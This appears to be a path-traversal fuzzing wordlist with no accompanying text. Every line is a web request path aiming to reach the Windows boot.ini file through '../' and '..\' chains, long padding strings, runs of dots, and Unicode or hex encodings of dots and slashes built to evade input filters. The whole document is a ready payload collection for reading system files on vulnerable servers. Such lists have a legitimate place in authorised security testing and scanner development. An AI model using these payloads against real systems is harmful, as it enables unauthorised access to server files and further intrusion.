-/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\..\boot.ini -/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\..\..\boot.ini -/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\..\..\..\boot.ini -/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\..\..\..\..\boot.ini -/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\..\..\..\..\..\boot.ini -/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../boot.ini -/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../boot.ini -/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../boot.ini -/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../boot.ini -/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../../boot.ini -/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../../../boot.ini -/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../../../../boot.ini -/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../../../../../boot.ini -/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\boot.ini -/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\boot.ini -/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\boot.ini -/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\..\boot.ini -/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\..\..\boot.ini -/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\..\..\..\boot.ini -/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\..\..\..\..\boot.ini -/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\..\..\..\..\..\boot.ini -/.../boot.ini -/.../.../boot.ini -/.../.../.../boot.ini -/.../.../.../.../boot.ini -/.../.../.../.../.../boot.ini -/.../.../.../.../.../.../boot.ini -/.../.../.../.../.../.../.../boot.ini -/.../.../.../.../.../.../.../.../boot.ini -/...\boot.ini -/...\...\boot.ini -/...\...\...\boot.ini -/...\...\...\...\boot.ini -/...\...\...\...\...\boot.ini -/...\...\...\...\...\...\boot.ini -/...\...\...\...\...\...\...\boot.ini -/...\...\...\...\...\...\...\...\boot.ini -/..../boot.ini -/..../..../boot.ini -/..../..../..../boot.ini -/..../..../..../..../boot.ini -/..../..../..../..../..../boot.ini -/..../..../..../..../..../..../boot.ini -/..../..../..../..../..../..../..../boot.ini -/..../..../..../..../..../..../..../..../boot.ini -/....\boot.ini -/....\....\boot.ini -/....\....\....\boot.ini -/....\....\....\....\boot.ini -/....\....\....\....\....\boot.ini -/....\....\....\....\....\....\boot.ini -/....\....\....\....\....\....\....\boot.ini -/....\....\....\....\....\....\....\....\boot.ini -/........................................................................../boot.ini -/........................................................................../../boot.ini -/........................................................................../../../boot.ini -/........................................................................../../../../boot.ini -/........................................................................../../../../../boot.ini -/........................................................................../../../../../../boot.ini -/........................................................................../../../../../../../boot.ini -/........................................................................../../../../../../../../boot.ini -/..........................................................................\boot.ini -/..........................................................................\..\boot.ini -/..........................................................................\..\..\boot.ini -/..........................................................................\..\..\..\boot.ini -/..........................................................................\..\..\..\..\boot.ini -/..........................................................................\..\..\..\..\..\boot.ini -/..........................................................................\..\..\..\..\..\..\boot.ini -/..........................................................................\..\..\..\..\..\..\..\boot.ini -/..%u2215boot.ini -/..%u2215..%u2215boot.ini -/..%u2215..%u2215..%u2215boot.ini -/..%u2215..%u2215..%u2215..%u2215boot.ini -/..%u2215..%u2215..%u2215..%u2215..%u2215boot.ini -/..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215boot.ini -/..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215boot.ini -/..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215boot.ini -/%uff0e%uff0e/boot.ini -/%uff0e%uff0e/%uff0e%uff0e/boot.ini -/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/boot.ini -/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/boot.ini -/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/boot.ini -/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/boot.ini -/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/boot.ini -/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/boot.ini -/%uff0e%uff0e%u2215boot.ini -/%uff0e%uff0e%u2215%uff0e%uff0e%u2215boot.ini -/%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215boot.ini -/%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215boot.ini -/%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215boot.ini -/%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215boot.ini -/%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215boot.ini -/%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215boot.ini -/..%u2216boot.ini -/..%u2216..%u2216boot.ini -/..%u2216..%u2216..%u2216boot.ini -/..%u2216..%u2216..%u2216..%u2216boot.ini -/..%u2216..%u2216..%u2216..%u2216..%u2216boot.ini -/..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216boot.ini -/..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216boot.ini -/..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216boot.ini -/..%uEFC8boot.ini -/..%uEFC8..%uEFC8boot.ini -/..%uEFC8..%uEFC8..%uEFC8boot.ini -/..%uEFC8..%uEFC8..%uEFC8..%uEFC8boot.ini -/..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8boot.ini -/..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8boot.ini -/..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8boot.ini -/..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8boot.ini -/..%uF025boot.ini -/..%uF025..%uF025boot.ini -/..%uF025..%uF025..%uF025boot.ini -/..%uF025..%uF025..%uF025..%uF025boot.ini -/..%uF025..%uF025..%uF025..%uF025..%uF025boot.ini -/..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025boot.ini -/..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025boot.ini -/..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025boot.ini -/%uff0e%uff0e\boot.ini -/%uff0e%uff0e\%uff0e%uff0e\boot.ini -/%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\boot.ini -/%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\boot.ini -/%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\boot.ini -/%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\boot.ini -/%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\boot.ini -/%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\boot.ini -/%uff0e%uff0e%u2216boot.ini -/%uff0e%uff0e%u2216%uff0e%uff0e%u2216boot.ini -/%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216boot.ini -/%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216boot.ini -/%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216boot.ini -/%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216boot.ini -/%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216boot.ini -/%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216boot.ini -/..0x2fboot.ini -/..0x2f..0x2fboot.ini -/..0x2f..0x2f..0x2fboot.ini -/..0x2f..0x2f..0x2f..0x2fboot.ini -/..0x2f..0x2f..0x2f..0x2f..0x2fboot.ini -/..0x2f..0x2f..0x2f..0x2f..0x2f..0x2fboot.ini -/..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f..0x2fboot.ini -/..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f..0x2fboot.ini -/0x2e0x2e/boot.ini -/0x2e0x2e/0x2e0x2e/boot.ini -/0x2e0x2e/0x2e0x2e/0x2e0x2e/boot.ini -/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/boot.ini -/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/boot.ini -/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/boot.ini -/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/boot.ini -/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/boot.ini -/0x2e0x2e0x2fboot.ini -/0x2e0x2e0x2f0x2e0x2e0x2fboot.ini -/0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2fboot.ini -/0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2fboot.ini -/0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2fboot.ini -/0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2fboot.ini -/0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2fboot.ini -/0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2fboot.ini -/..0x5cboot.ini -/..0x5c..0x5cboot.ini -/..0x5c..0x5c..0x5cboot.ini -/..0x5c..0x5c..0x5c..0x5cboot.ini -/..0x5c..0x5c..0x5c..0x5c..0x5cboot.ini -/..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cboot.ini -/..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cboot.ini -/..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cboot.ini -/0x2e0x2e\boot.ini -/0x2e0x2e\0x2e0x2e\boot.ini -/0x2e0x2e\0x2e0x2e\0x2e0x2e\boot.ini -/0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\boot.ini -/0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\boot.ini 